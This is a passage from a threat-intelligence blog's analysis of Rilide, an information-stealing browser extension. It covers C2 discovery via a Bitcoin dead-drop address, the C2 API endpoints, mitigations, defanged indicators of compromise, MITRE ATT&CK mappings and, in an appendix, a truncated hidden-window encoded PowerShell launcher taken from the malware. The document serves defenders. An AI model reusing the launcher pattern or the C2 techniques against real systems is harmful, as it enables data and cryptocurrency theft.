The address is 1Aybhtfb3TM36MDmULVXJVAFni8V8tR4aS and decodes to the C2 server memento-mori[.]com
https://blog.pulsedive.com/rilide-an-information-stealing-browser-extension/
Page 25 of 31

Figure 39: The second BitCoin address can be decoded into the C2 domain using base58.
C2 Communication
Once the C2 server has been identified, the extension starts exfiltrating information back to it. The malware returns system
information data to the C2 server via a POST request to the URI /api/machine/init .
Figure 40: System information exfiltrated by Rilide.
The information includes:
CPU details
Operating System information
Display information
Extension details
Other commands observed within network traffic include:
/api/machine/injections
/api/machine/commands
https://blog.pulsedive.com/rilide-an-information-stealing-browser-extension/
Page 26 of 31

/api/machine/settings
/api/machine/clipper
/api/machine/screenshot-rules
/api/machine/set-command
Figure 41: Phases returned by the C2 used to determine what information Rilide targets. This command also
returns a reverse proxy address if the malware uses one.
Mitigations
Extension Management
Avoid installing extensions from untrusted sources or third-party websites.
While using Browser Extensions Stores significantly reduces the risk of downloading malicious
extensions, it does not eliminate the risk. Our blog, Compromised Browser Extensions - A Growing
Threat Vector, highlights compromised extensions on the Chrome Store.
Users should review permissions used by extensions before installing them.
Users should periodically review installed extensions to identify any that are no longer needed and remove
them.
PowerShell Logging
Enable PowerShell logging features, including:
Module Logging
Script Block logging
Have PowerShell logs being ingested into SIEM or centralized log management solutions for monitoring
Block users from running PowerShell Commands
Restrict PowerShell usage to only those that are required to run PowerShell commands.
Indicators of Compromise
The table below contains all Rilide network IoCs identified during the analysis of the intrusion chain. 
IOCs
https://blog.pulsedive.com/rilide-an-information-stealing-browser-extension/
Page 27 of 31

hxxps[://]blockstream[.]info/api/address/bc1qkljhfktumxjqa52yle0xzz9nd4jl40vzyyc066/txs
hxxps[://]bitcoinexplorer[.]org/api/address/bc1qkljhfktumxjqa52yle0xzz9nd4jl40vzyyc066?limit=1
hxxps[://]api[.]blockcypher[.]com/v1/btc/main/addrs/bc1qkljhfktumxjqa52yle0xzz9nd4jl40vzyyc066/full?limit=1
hxxps[://]mempool[.]space/api/address/bc1qkljhfktumxjqa52yle0xzz9nd4jl40vzyyc066/txs
hxxps[://]api[.]bitcore[.]io/api/BTC/mainnet/address/bc1qkljhfktumxjqa52yle0xzz9nd4jl40vzyyc066/txs?limit=1
hxxps[://]mmemento-mori[.]com/api/machine/sign?d=mmemento-mori[.]com
hxxps[://]mmemento-mori[.]com/api/machine/init
hxxps[://]mmemento-mori[.]com/api/machine/injections?uuid=31d7f9d7-a0ea-46be-88b7-196bc3e2e5e1
hxxps[://]mmemento-mori[.]com/api/machine/commands?uuid=31d7f9d7-a0ea-46be-88b7-196bc3e2e5e1
hxxps[://]mmemento-mori[.]com/api/machine/settings
hxxps[://]mmemento-mori[.]com/api/machine/clipper
hxxps[://]mmemento-mori[.]com/api/machine/screenshot-rules
hxxps[://]mmemento-mori[.]com/api/machine/set-command
hxxps[://]tcl-black[.]com/1111[.]bs64
tcl-black[.]com
The table below contains a subset of additional Rilide network IoCs that have been added to the Pulsedive platform. This
data can be queried in Pulsedive using the Explore query threat=Rilide and is available for export in multiple formats (CSV,
STIX 2.1, JSON).
IOCs
ashgrrwt[.]click
https://blog.pulsedive.com/rilide-an-information-stealing-browser-extension/
Page 28 of 31

nch-software[.]info
nvidia-graphics[.]top
vceilinichego[.]ru
45[.]15[.]156[.]210
web-lox[.]com
assets[.]bnbcoinstatic[.]com
proyectopatentadomxapostol[.]com
blackfox[.]lol
pupkalazalupka[.]com
extension-login[.]com
tes123123t[.]com
extensionsupdate[.]com
hxxps[:=//]download[.]hdoki[.]org/yzxdhdxsqkmvcayrtevs/RiotRevelry1[.]0[.]2[.]exe
hxxps[:=//]nch-software[.]info/1/2[.]exe
nightpredators[.]com
Rilide MITRE ATT&CK TTPs
Technique Tactic
Collection Clipboard data (T1115)
Email Collection (T1114)
https://blog.pulsedive.com/rilide-an-information-stealing-browser-extension/
Page 29 of 31

Screen Capture (T1113)
Command and Control
Application Layer Protocol: Web Protocols (T1071.001)
Dynamic Resolution (T1568)
Web Service: Dead Drop Resolver (T1102.001)
Proxy: External Proxy (T1090.002)
Ingress Tool Transfer (T1105)
Credential Access
Clipboard data (T1115)
Steal Web Session Cookie (T1539)
Defense Evasion
Access Token Manipulation (T1134)
Deobfuscate/Decode Files or Information (T1140)
Masquerading (T1036)
Obfuscated Files or Information (T1027)
Process Injection (T1055)
Virtualization/Sandbox Evasion: User Activity Based Checks (T1497.002)
Discovery
System Information Discovery (T1082)
Virtualization/Sandbox Evasion: User Activity Based Checks (T1497.002)
Evasion Masquerading (T1036)
Execution Command and Scripting Interpreter: PowerShell (T1059.001)
Command and Scripting Interpreter: JavaScript (T1059.007)
https://blog.pulsedive.com/rilide-an-information-stealing-browser-extension/
Page 30 of 31

User Execution: Malicious File (T1204.002)
Initial Access Phishing (T1566)
Persistence
Boot or Logon Autostart Execution (T1547)
Browser Extensions (T1176)
Privilege Escalation
Access Token Manipulation (T1134)
Boot or Logon Autostart Execution (T1547)
Process Injection: Process Hollowing (T1055.012)
References
https://developer.chrome.com/docs/extensions/develop/migrate
https://thehackernews.com/2023/08/new-version-of-rilide-data-theft.html
https://x.com/vmray/status/1862414695002501223
https://www.vmray.com/analyses/76afc4a7ef10/report/overview.html
https://www.virustotal.com/gui/file/76afc4a7ef10d760c3fa42458e8f133f1ed4d76071ab6f4207037f64a4bffab7/detection
https://urlscan.io/result/08eff9cb-4431-4fc9-b957-0733a5391e5e/
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/rilide-a-new-malicious-browser-extension-for-stealing-cryptocurrencies/
https://www.trellix.com/en-in/blogs/research/genesis-market-no-longer-feeds-the-evil-cookie-monster/ 
https://www.exabeam.com/blog/security-operations-center/powershell-and-command-line-logging-with-logrhythm/
Appendix 1 - PowerShell Script
"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -e JABsAFUAaABwAEoAIAA9ACAAKAAiAGsAcABDAD
Source: https://blog.pulsedive.com/rilide-an-information-stealing-browser-extension/
https://blog.pulsedive.com/rilide-an-information-stealing-browser-extension/
Page 31 of 31